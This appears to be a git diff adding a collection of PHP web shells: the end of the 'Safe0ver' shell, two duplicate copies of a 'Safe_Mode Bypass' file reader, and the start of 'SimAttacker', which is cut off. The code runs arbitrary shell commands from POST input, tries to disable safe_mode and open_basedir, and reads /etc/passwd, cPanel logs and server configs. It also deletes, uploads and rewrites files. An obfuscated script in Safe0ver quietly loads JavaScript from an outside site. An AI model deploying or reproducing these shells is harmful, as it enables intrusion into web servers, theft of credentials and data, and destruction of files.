+      echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
+      echo "</table></td>";
+     echo "</table>";
+     echo "<br>";
+         @closedir($h);
+  }
+  elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
+     echo system("$file");
+ }
+elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
+    echo "<center><table><tr><td NOWRAP>" ;
+     if ($auth == "yes") {
+        if (Mydeldir($file)==false) {
+             echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
+          }
+         else {
+             echo "Successfully removed \"$file\"<br>";
+         }
+         echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
+    }
+     else {
+        echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+        <input type=\"hidden\" name=\"cmd\" value=\"deldir\">
+         <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+         <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+         <input type=\"hidden\" name=\"file\" value=\"$file\">
+         <input type=\"hidden\" name=\"auth\" value=\"yes\">
+         <input type=\"submit\" value=\"Yes\"></form>
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+    <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+    <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+    <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+        }
+     echo "</td></tr></center>";
+}
+ elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */    echo "<center><table><tr><td NOWRAP>" ;
+     if ($auth == "yes") {
+        if (@unlink($file)==false) {
+             echo "Could not remove \"$file\"<br>";
+          }
+         else {
+             echo "Successfully removed \"$file\"<br>";
+         }
+        echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
+        }
+     else {
+           echo "Are you sure you want to delete \"$file\" ?
+          <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+         <input type=\"hidden\" name=\"cmd\" value=\"delfile\">
+         <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+         <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+         <input type=\"hidden\" name=\"file\" value=\"$file\">
+         <input type=\"hidden\" name=\"auth\" value=\"yes\">
+
+         <input type=\"submit\" value=\"Yes\"></form>
+           <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+    <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+    <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+    <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+        }
+     echo "</td></tr></center>";
+}
+elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
+    echo "<center><table><tr><td NOWRAP>";
+     $i = 1;
+     while (file_exists("$lastdir/newfile$i.txt"))
+         $i++;
+     $file = fopen("$lastdir/newfile$i.txt", "w+");
+     if ($file == false)
+         echo "Could not create the new file...<br>";
+     else
+         echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
+         echo "
+               <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+            <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+            <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+            <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
+            </form></center>
+             </td></tr></table></center>           ";
+    }
+elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
+    echo "<center><table><tr><td NOWRAP>" ;
+     $i = 1;
+     while (is_dir("$lastdir/newdir$i"))
+          $i++;
+     $file = mkdir("$lastdir/newdir$i", 0777);
+     if ($file == false)
+         echo "Could not create the new directory...<br>";
+     else
+         echo "Successfully created: \"$lastdir/newdir$i\"<br>";
+     echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+        <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+        <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+        <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
+        </form></center></td></tr></table></center>";
+}
+elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
+    $contents = "";
+    $fc = @file( $file );
+      while ( @list( $ln, $line ) = each( $fc ) ) {
+          $contents .= htmlentities( $line ) ;
+     }
+     echo "<br><center><table><tr><td NOWRAP>";
+    echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+    echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
+    echo "<strong>EDIT FILE: </strong>$file<br>\n";
+    echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
+    echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
+    echo "<input type=\"submit\" value=\"Save\">";
+    echo "</form>";
+    echo "</td></tr></table></center>";
+}
+elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
+    $fo = fopen($file, "w");
+    $wrret = fwrite($fo, stripslashes($contents));
+    $clret = fclose($fo);
+}
+elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
+    $downloadfile = urldecode($file);
+    if (function_exists("basename"))
+            $downloadto = basename ($downloadfile);
+    else
+        $downloadto = "download.ext";
+    if (!file_exists("$downloadfile"))
+        echo "The file does not exist";
+    else {
+        $size = @filesize("$downloadfile");
+        if ($size != false) {
+            $add="; size=$size";
+        }            
+        else {
+            $add="";
+        }
+         header("Content-Type: application/download");
+        header("Content-Disposition: attachment; filename=$downloadto$add");
+        $fp=fopen("$downloadfile" ,"rb");
+        fpassthru($fp);
+        flush();
+    }
+}
+elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */ 
+       ?>
+    <center>
+     <table>
+      <tr>
+       <td NOWRAP>
+            Dosya Yükleme Sekmesine Tikladiniz !
+        <br> Eger Yüklemek istediginiz Dosya mevcut ise üzerine Yazilir.<br><br>
+      <form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
+             <input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
+             <input type="hidden" name="cmd" value="uploadproc">
+             <input type="hidden" name="dir" value="<?php echo $dir ?>">
+             <input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
+             <input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
+             Dosya Yükle:<br>
+             <input size="75" name="userfile" type="file"><br>
+             <input type="submit" value="Yükle">
+      </form>
+        <br>
+         <form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
+            <input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
+            <input type="hidden" name="dir" value="<?php echo $lastdir ?>">
+            <input tabindex="0" type="submit" value="Iptal">
+        </form>
+    </td>
+   </tr>
+ </table>
+    </center>
+
+     <?php
+}
+elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
+    echo "<center><table><tr><td NOWRAP>";
+    if (file_exists($userfile))
+        $res = copy($userfile, "$dir/$userfile_name");
+    echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
+         if ($res) {
+        echo "Basariyla Yüklendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
+        echo "Yüklenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>";
+        echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
+    }
+    else {
+        echo "Yüklenemedi...";
+    }
+    echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
+    echo "<br><br></td></tr></table></center>";
+}
+elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
+        echo "<hr>"; 
+    $fc = @file( $file );      while ( @list( $ln, $line ) = each( $fc ) ) {
+          echo spacetonbsp(@htmlentities($line))."<br>\n";
+      }
+    echo "<hr>";
+}
+elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
+         if (function_exists('is_dir')) {
+         if (is_dir("$oldfile")) {
+             $objname = "Directory";
+             $objident = "Directory";
+          }
+         else {
+             $objname = "Filename";
+             $objident = "file";
+         }
+     }
+       echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
+    If (empty($newfile) != true) {
+         echo "<center>";
+         $return = @rename($oldfile, "$olddir$newfile");
+        if ($return) {
+             echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
+         }
+         else {
+             if ( @file_exists("$olddir$newfile") ) {
+                 echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
+             }
+             else {
+                 echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
+             }
+          }
+         echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
+     }
+     else {
+         $dpos = strrpos($oldfile, "/");
+         if (strval($dpos)!="") {
+             $olddir = substr($oldfile, 0, $dpos+1);
+           }
+         else {
+             $olddir = "$lastdir/";
+        }
+         $fpos = strrpos($oldfile, "/");
+         if (strval($fpos)!="") {
+             $inputfile = substr($oldfile, $fpos+1);
+           }
+         else {
+             $inputfile = "";
+         }
+               echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+         echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
+         echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
+         echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
+         echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
+         echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
+         echo "Rename \"$oldfile\" to:<br>\n";
+         echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">"; 
+        echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
+         echo "</td></tr></table></center>";
+     }
+}
+else if ( $cmd == "con") {
+
+?>
+<center>
+<table>
+ <tr><td>&nbsp;</td>
+ </tr></table>
+<?php
+}    
+else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
+    $isMainMenu = true;
+     ?>
+    <table width="100%" border="0" cellpadding="0" cellspacing="0">
+     <tr>
+      <td width="100%" class="border">
+       <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
+      </td>
+     </tr>
+    </table>
+    <br>
+     <center>
+    <table border="0" NOWRAP>
+      <tr>
+      <td valign="top" class="silver border">
+           <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?>      </td>
+       <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass Özelligi Eklenmis Ve Böylece Tahrip Gücü Yükseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya Sömüren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullanım:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br>
+        </span></td>
+     </tr>
+       </table>
+    <br><p><br>Safe Mode ByPAss<p><form method="POST">
+	<p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
+	<input type="submit" value="Çalistir"></p>
+</form>
+	<form method="POST">
+		<p align="center"><select size="1" name="dizin">
+                <option value="uname -a;id;pwd;hostname">Sistem Bilgisi</option>
+		<option value="cat /etc/passwd">cat /etc/passwd</option>
+		<option value="cat /var/cpanel/accounting.log">cat /var/cpanel/accounting.log</option>
+		<option value="cat /etc/syslog.conf">cat /etc/syslog.conf</option>
+		<option value="cat /etc/hosts">cat /etc/hosts</option>
+                <option value="cat /etc/named.conf">cat /etc/named.conf</option>
+                <option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option>
+                <option value="netstat -an | grep -i listen">Açik Portlar</option>
+                <option value="ps -aux">Çalisan Uygulamalar</option>
+</select> <input type="submit" value="Çalistir"></p>
+	</form>
+------------------------------------------------------------------------------------<p>
+<?
+$evilc0der=$_POST['dizin'];
+if($_POST['dizin'])
+{
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+$safemodgec = shell_exec($evilc0der);
+echo "<textarea rows=17 cols=85>$safemodgec</textarea>";
+}
+?>
+<Script Language='Javascript'>
+<!-- HTML Encryption provided by iWEBTOOL.com -->
+<!--
+document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%65%76%69%6C%63%30%64%65%72%2E%6F%72%67%2F%6C%6F%67%7A%2F%79%61%7A%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E'));
+//-->
+</Script>
+</center>
+    <br>
+     <?php
+}
+
+if ($cmd != "downl") {
+    if ( $isMainMenu != true) {
+         ?>
+
+		<table width="100%" border="0" cellpadding="0" cellspacing="0">
+         <tr>
+          <td width="100%" style="class="silver border">
+           <center><strong>
+            &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;]  </font>", "cmd=&dir=");      ?>&nbsp;&nbsp;
+            &nbsp;&nbsp;&nbsp;&nbsp;
+                    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;R00T&nbsp;]  </font>", "cmd=dir&dir=.");  ?> &nbsp;&nbsp;
+            </strong></center>
+          </td>
+         </tr>
+        </table>
+        <br>
+        <?php
+}
+    ?>
+    <table width=100% border="0" cellpadding="0" cellspacing="0">
+     <tr>
+      <td width="100%" class="silver border">
+       <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
+      </td>
+     </tr>
+    </table>
+        </td>
+  </tr>
+ </table>
+
+  <?php
+ }
+
+?> 
+
+
+
+
+ 
+
+
+
+
+
diff --git a/php/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php b/php/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php
new file mode 100644
index 0000000..ac5dc38
--- /dev/null
+++ b/php/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php	
@@ -0,0 +1,89 @@
+<head>
+<meta http-equiv="Content-Language" content="en-us">
+</head>
+<STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style>
+<p align="center"><b><font face="Webdings" size="6" color="#FF0000">!</font><font face="Verdana" size="5" color="#DADADA"><a href="?	"><span style="color: #DADADA; text-decoration: none; font-weight:700"><font face="Times New Roman">Safe 
+Mode Shell v1.0</font></span></a></font><font face="Webdings" size="6" color="#FF0000">!</font></b></p>
+<form method="POST">
+	<p align="center"><input type="text" name="file" size="20">
+	<input type="submit" value="Open" name="B1"></p>
+</form>
+	<form method="POST">
+		<p align="center"><select size="1" name="file">
+		<option value="/etc/passwd">Get /etc/passwd</option>
+		<option value="/var/cpanel/accounting.log">View cpanel logs</option>
+		<option value="/etc/syslog.conf">Syslog configuration</option>
+		<option value="/etc/hosts">Hosts</option>
+		</select> <input type="submit" value="Go" name="B1"></p>
+	</form>
+
+
+<?php
+/*
+Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
+by PHP Emperor<xb5@hotmail.com>
+*/
+
+echo "<head><title>Safe Mode Shell</title></head>"; 
+
+
+
+
+$tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp
+
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+echo("Safe-mode: $hsafemode");
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+echo("<br>");
+echo("Open base dir: $hopenbasedir");
+echo("<br>");
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+
+echo "<PRE>\n";
+if(empty($file)){
+if(empty($_GET['file'])){
+if(empty($_POST['file'])){
+die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n <B><CENTER><FONT
+COLOR=\"RED\">PHP Emperor
+xb5@hotmail.com</FONT></CENTER></B>");
+} else {
+$file=$_POST['file'];
+}
+} else {
+$file=$_GET['file'];
+}
+}
+
+$temp=tempnam($tymczas, "cx");
+
+if(copy("compress.zlib://".$file, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "<B>--- Start File ".htmlspecialchars($file)."
+-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
+".htmlspecialchars($file)." ---------------\n";
+unlink($temp);
+die("\n<FONT COLOR=\"RED\"><B>File
+".htmlspecialchars($file)." has been already loaded. PHP Emperor <xb5@hotmail.com>
+;]</B></FONT>");
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+access.</CENTER></FONT>");
+}
+?>
\ No newline at end of file
diff --git a/php/Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php b/php/Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php
new file mode 100644
index 0000000..77abafc
--- /dev/null
+++ b/php/Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php
@@ -0,0 +1,90 @@
+<head>
+<meta http-equiv="Content-Language" content="en-us">
+</head>
+<STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style>
+<p align="center"><b><font face="Webdings" size="6" color="#FF0000">!</font><font face="Verdana" size="5" color="#DADADA"><a href="?	"><span style="color: #DADADA; text-decoration: none; font-weight:700"><font face="Times New Roman">Safe 
+Mode Shell v1.0</font></span></a></font><font face="Webdings" size="6" color="#FF0000">!</font></b></p>
+<form method="POST">
+	<p align="center"><input type="text" name="file" size="20">
+	<input type="submit" value="Open" name="B1"></p>
+</form>
+	<form method="POST">
+		<p align="center"><select size="1" name="file">
+		<option value="/etc/passwd">Get /etc/passwd</option>
+		<option value="/var/cpanel/accounting.log">View cpanel logs</option>
+		<option value="/etc/syslog.conf">Syslog configuration</option>
+		<option value="/etc/hosts">Hosts</option>
+		</select> <input type="submit" value="Go" name="B1"></p>
+	</form>
+
+
+<?php
+/*
+Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
+by PHP Emperor<xb5@hotmail.com>
+*/
+
+echo "<head><title>Safe Mode Shell</title></head>"; 
+
+
+
+
+$tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp
+
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+echo("Safe-mode: $hsafemode");
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+echo("<br>");
+echo("Open base dir: $hopenbasedir");
+echo("<br>");
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+
+echo "<PRE>\n";
+if(empty($file)){
+if(empty($_GET['file'])){
+if(empty($_POST['file'])){
+die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n <B><CENTER><FONT
+COLOR=\"RED\">PHP Emperor
+xb5@hotmail.com</FONT></CENTER></B>");
+} else {
+$file=$_POST['file'];
+}
+} else {
+$file=$_GET['file'];
+}
+}
+
+$temp=tempnam($tymczas, "cx");
+
+if(copy("compress.zlib://".$file, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "<B>--- Start File ".htmlspecialchars($file)."
+-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
+".htmlspecialchars($file)." ---------------\n";
+unlink($temp);
+die("\n<FONT COLOR=\"RED\"><B>File
+".htmlspecialchars($file)." has been already loaded. PHP Emperor <xb5@hotmail.com>
+;]</B></FONT>");
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+access.</CENTER></FONT>");
+}
+?>
+
diff --git a/php/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php b/php/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php
new file mode 100644
index 0000000..9d41bb6
--- /dev/null
+++ b/php/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php	
@@ -0,0 +1,378 @@
+<?
+//download Files  Code
+$fdownload=$_GET['fdownload'];
+if ($fdownload <> "" ){
+// path & file name
+$path_parts = pathinfo("$fdownload");
+$entrypath=$path_parts["basename"];
+$name = "$fdownload";
+$fp = fopen($name, 'rb');
+header("Content-Disposition: attachment; filename=$entrypath");
+header("Content-Length: " . filesize($name));
+fpassthru($fp);
+exit;
+}
+?>
+	
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="en-us">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
+<title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>
+<style>
+<!--
+body         { font-family: Tahoma; font-size: 8pt }
+-->
+</style>
+</head>
+<body>
+<?
+error_reporting(E_ERROR | E_WARNING | E_PARSE);
+
+ //File Edit
+ $fedit=$_GET['fedit'];
+ if ($fedit <> "" ){
+ $fedit=realpath($fedit);
+ $lines = file($fedit);
+ echo "<form action='' method='POST'>";
+echo "<textarea name='savefile' rows=30 cols=80>" ;
+foreach ($lines as $line_num => $line) {
+ echo htmlspecialchars($line);
+}
+echo "</textarea>
+	<input type='text' name='filepath'  size='60' value='$fedit'>
+	<input type='submit' value='save'></form>";
+	$savefile=$_POST['savefile'];
+	$filepath=realpath($_POST['filepath']);
+	if ($savefile <> "") 
+	{
+	$fp=fopen("$filepath","w+");
+	fwrite ($fp,"") ;
+	fwrite ($fp,$savefile) ;
+	fclose($fp);
+	echo "<script language='javascript'> close()</script>";
+	}
+exit();
+ }
+?>
+<?
+// CHmod - PRimission
+$fchmod=$_GET['fchmod'];
+if ($fchmod <> "" ){
+$fchmod=realpath($fchmod);
+echo "<center><br>
+chmod for :$fchmod<br>
+<form method='POST' action=''><br>
+Chmod :<br>
+<input type='text' name='chmod0' ><br>
+<input type='submit' value='change chmod'>
+</form>";
+$chmod0=$_POST['chmod0'];
+if ($chmod0 <> ""){
+chmod ($fchmod , $chmod0);
+}else {
+echo "primission Not Allow change Chmod";
+}
+exit();
+}
+?>
+	
+<div align="center">
+	<table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
+		<tr>
+			<td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
+				<p align="center"><b>
+				<font face="Tahoma" size="2"><br>
+				</font>
+				<font color="#D2D200" face="Tahoma" size="2">
+				<span style="text-decoration: none">
+				<font color="#000000">
+				<a href="?id=fm&dir=<?
+	echo getcwd();
